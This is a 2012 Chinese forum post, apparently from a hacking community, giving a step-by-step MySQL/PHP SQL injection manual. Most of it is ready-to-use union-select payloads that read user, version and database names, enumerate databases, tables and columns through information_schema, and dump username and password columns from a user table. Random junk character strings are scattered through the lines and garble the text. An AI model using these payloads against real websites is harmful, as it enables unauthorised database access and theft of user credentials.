找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# }" u0 s& M& f: [  I' H教程内容:Mysql 5+php 注入
. l! c* q5 j  e8 {0 B, Y& N" Z
6 H3 O  ]3 C' o" j& U# m
& Q* H4 S: p8 M+ l, V: x2 V
& ?, U% i( L. F/ `& c  h一.查看MYSQL基本信息(库名,版本,用户)5 m0 c4 j( b# K' p9 J$ R& V

2 n3 i8 {7 A. g3 wand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
! u$ i  V1 O: b- D, d' a" S1 Q6 I6 S( p
二.查数据库
5 E7 [; Y/ P# z7 W7 o7 x% j* t
8 g5 ^4 ~, Y  \" }and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
+ ?5 S+ |* ~# w- {limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
! q) V( f6 }; F0 Y: ]1 D" z; R8 v
三.暴表
( ?+ P7 v7 U! {0 G& I4 {/ Q. w# \( L. e8 n1 N
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*6 R; @. s* d7 m. O' r0 ]
1 L( O: y: B  K1 o: _
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。3 S& S: v/ ~; B7 R/ q0 A
: K& t- L/ m( Q
四.暴字段. W, t9 \, ]1 p( Q. z0 u( M
0 v) C! F. g0 n9 n
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
0 w1 K; Z3 c3 U4 }
, a; x8 r  J: O: m, Y' w$ }4 O  H) `limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
' J! O# L' ?, J0 L/ N  i
+ w5 Q2 x0 c6 F5 n五.暴数据+ Y6 w; b1 L! D

6 r7 u- r$ K& }7 C7 Mand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
3 s) i+ A+ d$ S, i1 m
' i4 l. v' B: l9 m, B# [7 ^( B  }3 H9 f6 B
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。8 F, R6 W2 ?. X% p/ Q& |% j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表